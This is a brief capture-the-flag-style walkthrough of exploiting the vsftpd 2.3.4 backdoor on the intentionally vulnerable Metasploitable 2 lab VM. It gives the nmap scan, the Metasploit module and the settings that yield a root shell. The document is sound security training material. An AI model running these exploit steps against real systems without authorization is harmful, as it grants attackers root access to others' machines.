This is the walk-through solution to exploit the vsftpd (very secure FTP daemon) vulnerability of the Metasploitable 2 virtual machine.
This walk-through was done using VirtualBox and IP address was 10.0.2.15.
Introduction
Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.
Scan with nmap
nmap -T4 -A -v 10.0.2.15 Output: ... PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 ...
We learn that:
- There is a ftp server on port 21, using vsftpd version 2.3.4
Exploit vsftpd with Metasploit
msfconsole search vsftpd use exploit/unix/ftp/vsftpd_234_backdoor show options set RHOST 10.0.2.15 show options exploit
We now have a shell on Metasploitable 2 virtual machine.
whoami Output: root
You are root!!!